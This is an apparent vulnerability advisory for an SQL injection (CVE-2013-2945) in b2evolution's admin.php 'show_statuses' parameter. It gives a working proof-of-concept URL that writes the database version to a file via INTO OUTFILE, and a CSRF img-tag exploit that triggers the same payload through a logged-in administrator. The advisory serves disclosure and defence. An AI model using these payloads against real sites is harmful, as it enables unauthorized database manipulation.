b2evolution contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the /blogs/admin.php script not properly sanitizing user-supplied input to the 'show_statuses' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
1) SQL Injection in b2evolution: CVE-2013-2945
The vulnerability exists due to insufficient validation of HTTP GET parameter "show_statuses" in "/blogs/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, PoC code below will create a "/tmp/file.txt" file, containing MySQL version:
http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
This vulnerability is also exploitable via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit malicious web page with CSRF exploit.
Basic CSRF exploit:
<img src="http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --">